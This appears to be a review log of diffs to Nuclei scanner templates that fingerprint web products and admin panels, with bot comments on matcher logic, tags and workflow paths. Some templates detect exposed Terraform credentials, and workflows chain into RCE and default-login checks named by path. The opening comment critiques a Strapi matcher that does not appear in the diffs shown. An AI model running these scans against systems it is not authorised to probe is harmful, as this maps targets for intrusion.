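Review bot: The word matcher for the new `/admin/init` path uses `'"data"'` and `'"uuid"'` with `condition: or`, and no `matchers-condition:` line is visible between `path:` and `matchers:`, so with the engine's default the template reports Strapi for any `200` response or any JSON body containing a `"data"` key — essentially every REST API. Add `matchers-condition: and` and replace the generic keys with something specific to the init endpoint, for instance the `"strapiVersion"` key the extractor already relies on (`- '"strapiVersion"'`). The extractor pattern `'"strapiVersion":"([0-9.]+)"'` is a good anchor; the matcher should be at least as specific.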


@ -3117,6 +3117,12 @@ requests:
- type: word
name: thinkphp
part: header
words:
- "ThinkPHP"
part: header
- type: word
name: apollo
part: body
words:
- "initApollo)(i.ApolloTargetServer.Self)"


@ -17,8 +17,8 @@ requests:
- type: word
part: body
words:
- access_key
- terraform
- "access_key"
- "terraform"
condition: and
- type: status


@ -1,10 +1,10 @@
id: thinkcmf-detection
info:
name: ThinkCMF Detection
author: pikpikcu
name: Detect ThinkCMF
author: pikpikcu,daffainfo
severity: info
tags: thinkcmf
tags: panel,thinkcmf,login
requests:
- method: GET
@ -13,12 +13,10 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "X-Powered-By: ThinkCMF"
part: header
condition: and
- '<meta name="author" content="ThinkCMF">'
- type: status
status:
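Review bot: The metadata is now internally inconsistent: `id: thinkcmf-detection` is unchanged and `name:` becomes `Detect ThinkCMF`, yet `tags:` becomes `panel,thinkcmf,login`, and the workflow hunk later in this commit references `technologies/thinkcmf-detect.yaml`. A template under technologies/ named "Detect …" should keep `tech`-style tags, and the id should match the file name the workflow uses, `id: thinkcmf-detect`. In the second hunk the matcher now appears to check only `'<meta name="author" content="ThinkCMF">'` in the body while the `X-Powered-By: ThinkCMF` header check is gone; if current versions still send that header, keeping it as a second matcher under `matchers-condition: and` would cut false positives from pages that merely credit ThinkCMF. The matcher list continues past this hunk.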


@ -1,24 +0,0 @@
id: voipmonitor-detect
info:
name: VoipMonitor detect
author: Yanyun
severity: info
tags: tech,voipmonitor
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'share.voipmonitor.org'
- 'VoIPmonitor'
condition: and


@ -1,25 +0,0 @@
id: wazuh-detect
info:
name: wazuh detect
author: cyllective
severity: info
description: Detects wazuh
tags: tech,wazuh
reference:
- https://github.com/wazuh/wazuh
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
condition: or
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'


@ -1,21 +0,0 @@
id: webmodule-ee-detection
info:
name: Webmodule Detection
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/7001
tags: webmodule-ee,tech
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200


@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/console"
matchers:
- type: word
words:


@ -11,14 +11,15 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: wondercms_"
- type: word
part: body
words:
- "Powered by WonderCMS"
- "https://www.wondercms.com"
condition: and
- type: status
status:
- 200


@ -13,11 +13,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Powered by wuzhicms"
- "五指CMS"
condition: or
- type: status
status:


@ -1,23 +0,0 @@
id: xxljob-admin-detect
info:
name: XXLJOB Admin Login
author: pdteam
severity: info
tags: tech,xxljob
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200


@ -4,6 +4,8 @@ info:
name: YApi Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.title:"YApi"
tags: tech,yapi
requests:
@ -13,7 +15,6 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenAM related nuclei templates on a given target.
workflows:
- template: technologies/openam-detect.yaml
- template: exposed-panels/openam-panel.yaml
subtemplates:
- tags: openam


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenSIS related nuclei templates on a given target.
workflows:
- template: technologies/opensis-detect.yaml
- template: exposed-panels/opensis-panel.yaml
subtemplates:
- tags: opensis


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all PhpCollab related nuclei templates on a given target.
workflows:
- template: technologies/phpcollab-detect.yaml
- template: exposed-panels/phpcollab-panel.yaml
subtemplates:
- tags: phpcollab


@ -6,8 +6,6 @@ info:
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
workflows:
- template: technologies/sitecore-default-page.yaml
- template: exposed-panels/sitecore-login.yaml
- template: technologies/default-sitecore-page.yaml
subtemplates:
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
- template: misconfiguration/sitecore-debug-page.yaml
- tags: sitecore
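Review bot: `- tags: vulnerabilities/sitecore-pre-auth-rce.yaml` under `subtemplates:` hands a file path to the `tags` selector, which matches templates by tag rather than by path, so this entry presumably selects nothing and that check is silently skipped; if the intent is to run the template, the key should be `- template: vulnerabilities/sitecore-pre-auth-rce.yaml`. The line is unchanged context here, but since the commit rewires the rest of this workflow it is the natural place to fix it. The trailing `- tags: sitecore` already provides the tag-based selection.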


@ -5,6 +5,6 @@ info:
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
workflows:
- template: technologies/thinkcmf-detection.yaml
- template: technologies/thinkcmf-detect.yaml
subtemplates:
- tags: thinkcmf


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VMware Pipeline related nuclei templates on a given target.
workflows:
- template: technologies/vmware-detect.yaml
- template: technologies/vmware/vmware-detect.yaml
subtemplates:
- tags: vmware


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target.
workflows:
- template: technologies/voipmonitor-detect.yaml
- template: exposed-panels/voipmonitor-panel.yaml
subtemplates:
- tags: voipmonitor


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target.
workflows:
- template: technologies/xxljob-admin-detect.yaml
- template: exposed-panels/xxljob-panel.yaml
subtemplates:
- template: default-logins/xxljob/xxljob-default-login.yaml